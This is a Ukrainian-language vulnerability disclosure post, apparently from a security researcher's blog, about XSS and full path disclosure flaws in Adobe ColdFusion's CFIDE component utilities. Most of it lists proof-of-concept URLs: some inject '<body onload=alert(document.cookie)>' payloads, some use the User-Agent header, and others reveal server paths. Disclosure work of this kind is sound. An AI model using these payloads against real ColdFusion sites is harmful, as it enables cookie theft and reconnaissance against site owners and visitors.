XSS та FPD уразливості в Adobe ColdFusion
23:51 23.09.201125.06.2011
У червні, 18.06.2011, я знайшов Cross-Site Scripting та Full path disclosure уразливості в Adobe ColdFusion. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в Adobe ColdFusion.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
23.09.2011
XSS:
http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)
http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)
http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)
http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)
Full path disclosure:
http://site/CFIDE/probe.cfm
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm
Через componentdetail.cfm та cfcexplorer.cfc можна отримати FPD навіть при відключених дебаг повідомленнях на сервері.
Уразливі Adobe ColdFusion 7 та попередні версії до XSS, і Adobe ColdFusion 9 та попередні версії до FPD.